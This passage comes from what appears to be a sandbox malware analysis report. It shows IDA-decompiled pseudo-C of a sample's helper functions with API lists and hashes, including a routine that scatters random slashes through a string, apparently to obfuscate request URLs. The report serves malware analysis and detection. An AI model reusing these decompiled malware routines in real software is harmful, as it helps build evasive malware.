								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                            0x006d55fe
                            0x006d5607
                            0x006d5608
                            0x006d560c
                            0x006d5612
                            0x006d5618
                            0x006d5621
                            0x006d5627
                            0x006d5631
                            0x006d5633
                            0x006d5639
                            0x006d563e
                            0x006d5649
                            0x006d564f
                            0x006d5654
                            0x006d5776
                            0x006d565a
                            0x006d565a
                            0x006d5667
                            0x006d566d
                            0x006d5673
                            0x006d5677
                            0x006d567d
                            0x006d568a
                            0x006d568e
                            0x006d5694
                            0x006d5697
                            0x006d569f
                            0x006d56a0
                            0x006d56a4
                            0x006d56a8
                            0x006d56ab
                            0x006d56ae
                            0x006d56b4
                            0x006d56bd
                            0x006d56c3
                            0x006d56c4
                            0x006d56c7
                            0x006d56c8
                            0x006d56c9
                            0x006d56d1
                            0x006d56d2
                            0x006d56d3
                            0x006d56d5
                            0x006d56d9
                            0x006d56dd
                            0x00000000
                            0x00000000
                            0x006d56e3
                            0x006d56ec
                            0x006d56f2
                            0x006d56fc
                            0x006d5700
                            0x006d5702
                            0x006d570f
                            0x006d5713
                            0x006d571b
                            0x006d5720
                            0x006d5732
                            0x006d5734
                            0x006d573a
                            0x006d573a
                            0x006d5743
                            0x006d5743
                            0x006d5745
                            0x006d574b
                            0x006d574b
                            0x006d574e
                            0x006d5754
                            0x006d5757
                            0x006d5760
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d5760
                            0x006d56b4
                            0x006d56ae
                            0x006d5697
                            0x006d5766
                            0x006d5766
                            0x006d576c
                            0x006d576c
                            0x006d5772
                            0x006d5772
                            0x006d577b
                            0x006d5781
                            0x006d5781
                            0x006d563e
                            0x006d578a

                            APIs
                            • SysAllocString.OLEAUT32(006D9284), ref: 006D5649
                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 006D572A
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5743
                            • SysFreeString.OLEAUT32(?), ref: 006D5772
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: cc72916c5c493e2c034dee70c34841dafb0c8f7f7e5114ba8f742c44939eee3b
                            • Instruction ID: 4500bd2c686e74480fbf0fdfa412cae28ea5163cc02bc1f6025eef3485f6b1c6
                            • Opcode Fuzzy Hash: cc72916c5c493e2c034dee70c34841dafb0c8f7f7e5114ba8f742c44939eee3b
                            • Instruction Fuzzy Hash: 38513E75D00609EFCB00DFA8C888DAEB7B6FF88705B254599E916EB324D7719D41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D19D1 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E006D19D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E006D43E5(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E006D17D5(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E006D4376(_t101,  &_v428, _a8, _t96 - _t81);
					E006D4376(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E006D17D5(_t101, 0x6da1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E006D17D5(_a16, _a4);
						E006D71DF(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L006D82AA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L006D82A4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E006D3506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E006D5422(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E006D4CD2(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x6da1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                            0x006d19d4
                            0x006d19e0
                            0x006d19e6
                            0x006d19eb
                            0x006d19ef
                            0x006d1b61
                            0x006d1b65
                            0x006d1b65
                            0x006d19f5
                            0x006d19f9
                            0x006d19fd
                            0x006d1a00
                            0x006d1a0b
                            0x006d1a11
                            0x006d1a16
                            0x006d1a19
                            0x006d1a33
                            0x006d1a42
                            0x006d1a4e
                            0x006d1a58
                            0x006d1a5d
                            0x006d1a5f
                            0x006d1a62
                            0x006d1b19
                            0x006d1b1f
                            0x006d1b30
                            0x006d1b43
                            0x006d1b59
                            0x00000000
                            0x006d1b5e
                            0x006d1a6b
                            0x006d1a72
                            0x006d1a76
                            0x006d1a7c
                            0x006d1a7e
                            0x006d1a80
                            0x006d1a82
                            0x006d1a84
                            0x006d1a8e
                            0x006d1a93
                            0x006d1a95
                            0x006d1a97
                            0x006d1a98
                            0x006d1a99
                            0x006d1a9a
                            0x006d1aa1
                            0x006d1aa8
                            0x006d1aab
                            0x006d1aab
                            0x006d1a78
                            0x006d1a78
                            0x006d1a78
                            0x006d1ab3
                            0x006d1abb
                            0x006d1ac7
                            0x006d1acc
                            0x006d1acc
                            0x006d1ad1
                            0x00000000
                            0x00000000
                            0x006d1ad3
                            0x006d1ad6
                            0x006d1ae3
                            0x00000000
                            0x00000000
                            0x006d1ae5
                            0x006d1ae5
                            0x006d1af2
                            0x006d1acc
                            0x006d1ad1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d1ad1
                            0x006d1afc
                            0x006d1aff
                            0x006d1b02
                            0x006d1b09
                            0x006d1b09
                            0x006d1b16
                            0x00000000
                            0x006d1b16
                            0x006d1a02
                            0x006d1a06
                            0x006d1a07
                            0x006d1a09
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d1a09
                            0x00000000

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 006D1A84
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 006D1A9A
                            • memset.NTDLL ref: 006D1B43
                            • memset.NTDLL ref: 006D1B59
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 3b64df5704e500bb0c2845f99a4f44afe3a0d0033d78f7647ff6618e4960c9df
                            • Instruction ID: bd15ac6f1c9e72d098565fdd439abb86c951dc2d1087d3aa5681b93564d5f8ab
                            • Opcode Fuzzy Hash: 3b64df5704e500bb0c2845f99a4f44afe3a0d0033d78f7647ff6618e4960c9df
                            • Instruction Fuzzy Hash: AD41BF31E01219BFDB509F68CC85BDE7776EF86310F04456BB8099B381EBB09E548B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D6643 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E006D6643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E006D7A71(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                            0x006d664f
                            0x006d6653
                            0x006d6654
                            0x006d6655
                            0x006d6657
                            0x006d6659
                            0x006d665c
                            0x006d6661
                            0x006d66f8
                            0x006d66ff
                            0x006d66ff
                            0x006d666a
                            0x006d6671
                            0x006d6681
                            0x006d6681
                            0x006d6687
                            0x006d6689
                            0x006d668e
                            0x006d6697
                            0x006d669d
                            0x006d66a2
                            0x006d66ad
                            0x006d66b1
                            0x006d66b3
                            0x006d66b4
                            0x006d66bd
                            0x006d66c1
                            0x006d66d2
                            0x006d66c3
                            0x006d66c8
                            0x006d66cd
                            0x006d66dc
                            0x006d66dc
                            0x006d66b1
                            0x006d66e2
                            0x006d66e8
                            0x006d66e8
                            0x006d66f1
                            0x006d66f6
                            0x006d66f6
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: 7d3ade1ce1ab53469be01c29c8c65ef43ba06fa92b1e1b5614ff15e65b88bd2b
                            • Instruction ID: eb39d04b89b173a5e73ea63aae26bf2d036caea0889b02ee2160d18782b22b34
                            • Opcode Fuzzy Hash: 7d3ade1ce1ab53469be01c29c8c65ef43ba06fa92b1e1b5614ff15e65b88bd2b
                            • Instruction Fuzzy Hash: D4212C75D01259EFCB11DFA4D98499EBBBAEF49340B2081AAF901E7310E730DA01CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5454 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E006D5454(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x6da2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x6da2f0; // 0x6d9bfead
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x6da2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                            0x006d545c
                            0x006d545f
                            0x006d5465
                            0x006d547d
                            0x006d547f
                            0x006d5484
                            0x006d5486
                            0x006d5489
                            0x006d548b
                            0x006d548e
                            0x006d5490
                            0x006d5490
                            0x006d5492
                            0x006d549d
                            0x006d54a2
                            0x006d54b3
                            0x006d54bb
                            0x006d54c0
                            0x006d54c3
                            0x006d54c6
                            0x006d54c8
                            0x006d54cb
                            0x006d54ce
                            0x006d54ce
                            0x006d54d1
                            0x006d54dc
                            0x006d54e1
                            0x006d54eb

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,006D2314,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D545F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D5477
                            • memcpy.NTDLL(00000000,014A9600,-00000008,?,?,?,006D2314,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D54BB
                            • memcpy.NTDLL(00000001,014A9600,00000001,006D3831,00000000,014A9600), ref: 006D54DC
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 5c1ae4a1ae3d9b904efd1506697acd29396a5ebbb78de809c3e93e2a15cdbafb
                            • Instruction ID: eaf6d749dee0eaf5b23d5576738c373c5c1df5f8eb110bf80a2d4baaaada21fc
                            • Opcode Fuzzy Hash: 5c1ae4a1ae3d9b904efd1506697acd29396a5ebbb78de809c3e93e2a15cdbafb
                            • Instruction Fuzzy Hash: A7110272E04254AFC7108BAADC88D9ABBEBEB80361B08017BF505D7350E7719E40C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D7571 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D7571(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                            0x006d757b
                            0x006d757f
                            0x006d7594
                            0x006d7596
                            0x006d759b
                            0x006d75a1
                            0x006d75a3
                            0x006d75a8
                            0x006d75b3
                            0x006d75aa
                            0x006d75aa
                            0x006d75aa
                            0x006d75a8
                            0x006d75c1

                            APIs
                            • memset.NTDLL ref: 006D757F
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 006D7594
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D75A1
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D75B3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 0ec2914526a29ae329eac8b68958c395154fa8240d67a6abd2f8c576e1847188
                            • Instruction ID: 78e10f509541e1351bbb9102b7ce515e5841113ecf8fb260f53ccf4d4728eaa4
                            • Opcode Fuzzy Hash: 0ec2914526a29ae329eac8b68958c395154fa8240d67a6abd2f8c576e1847188
                            • Instruction Fuzzy Hash: 09F05EB5905308BFD3106F62ECC4C67BBADEB46298B11492FF54682211DB71A9098AB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D75C2 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D75C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x6da30c; // 0x18c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x6da35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x6da30c; // 0x18c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x6da2d8; // 0x10b0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                            0x006d75c2
                            0x006d75c9
                            0x006d7613
                            0x006d7615
                            0x006d7615
                            0x006d75cd
                            0x006d75d3
                            0x006d75d8
                            0x006d75dc
                            0x006d75e2
                            0x006d75e9
                            0x00000000
                            0x00000000
                            0x006d75eb
                            0x006d75f0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d75f0
                            0x006d75f2
                            0x006d75fa
                            0x006d75fd
                            0x006d75fd
                            0x006d7603
                            0x006d760a
                            0x006d760d
                            0x006d760d
                            0x00000000

                            APIs
                            • SetEvent.KERNEL32(0000018C,00000001,006D394C), ref: 006D75CD
                            • SleepEx.KERNEL32(00000064,00000001), ref: 006D75DC
                            • CloseHandle.KERNEL32(0000018C), ref: 006D75FD
                            • HeapDestroy.KERNEL32(010B0000), ref: 006D760D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: a63469d6fd7bb0af451836797375907ad6b95a17f897a602858007453d9c5f4c
                            • Instruction ID: 7686bfea48a9a84d94f58d13e2d24dd8f2c2ab3599d4cfe16e159584c37dca55
                            • Opcode Fuzzy Hash: a63469d6fd7bb0af451836797375907ad6b95a17f897a602858007453d9c5f4c
                            • Instruction Fuzzy Hash: 90F01C71E0A61197DB205B7AFC48B9637DBAB04B61B091516BC01E23E1EB30D940C666
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D731D Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E006D731D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x6da3cc; // 0x14a9600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x6da3cc; // 0x14a9600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x6da3cc; // 0x14a9600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x6db827) {
					HeapFree( *0x6da2d8, 0, _t10);
					_t7 =  *0x6da3cc; // 0x14a9600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                            0x006d731d
                            0x006d7326
                            0x006d7336
                            0x006d7336
                            0x006d733b
                            0x006d7340
                            0x00000000
                            0x00000000
                            0x006d7330
                            0x006d7330
                            0x006d7342
                            0x006d7347
                            0x006d734b
                            0x006d735e
                            0x006d7364
                            0x006d7364
                            0x006d736d
                            0x006d736f
                            0x006d7373
                            0x006d7379

                            APIs
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D7326
                            • Sleep.KERNEL32(0000000A), ref: 006D7330
                            • HeapFree.KERNEL32(00000000), ref: 006D735E
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D7373
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 57d332855a64bdb81009a4cd25ee5d09091b7d279e3ca6f8de7c91f809cacac5
                            • Instruction ID: 2c2336e9d4a325af72d127ebe6451b20ae5225477e889348e7f603a8c71b2b8a
                            • Opcode Fuzzy Hash: 57d332855a64bdb81009a4cd25ee5d09091b7d279e3ca6f8de7c91f809cacac5
                            • Instruction Fuzzy Hash: 17F0FE74E0A201DFE7289F99EC59E5937B7AB84300B06601FE902D73B0D730AC00EA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D452E Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E006D452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E006D7A71(_t2);
				if(_t34 != 0) {
					_t30 = E006D7A71(_t28);
					if(_t30 == 0) {
						E006D789E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E006D7ABF(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E006D7ABF(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                            0x006d452e
                            0x006d4538
                            0x006d453a
                            0x006d4540
                            0x006d4540
                            0x006d4549
                            0x006d454d
                            0x006d4559
                            0x006d455d
                            0x006d45d1
                            0x006d455f
                            0x006d455f
                            0x006d4563
                            0x006d4568
                            0x006d456d
                            0x006d4587
                            0x006d4576
                            0x006d4576
                            0x006d457a
                            0x006d457d
                            0x006d4582
                            0x006d4582
                            0x006d458c
                            0x006d45b4
                            0x006d45ba
                            0x006d45bd
                            0x006d458e
                            0x006d4590
                            0x006d4598
                            0x006d45a3
                            0x006d45a8
                            0x006d45a8
                            0x006d45c4
                            0x006d45cb
                            0x006d45cc
                            0x006d45cc
                            0x006d455d
                            0x006d45dc

                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0), ref: 006D453A
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                              • Part of subcall function 006D7ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,006D4568,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102), ref: 006D7ACD
                              • Part of subcall function 006D7ABF: StrChrA.SHLWAPI(?,0000003F,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D7AD7
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?), ref: 006D4598
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D45A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D45B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: e6cb650a354e76ee0d0f76a61afb4a3e50f3ba4b775001102c8c3b00b616edf2
                            • Instruction ID: 30ae1114eb186743208affa78ac86635a7735c3281f3c67d6d0c2bc93fe5f8f5
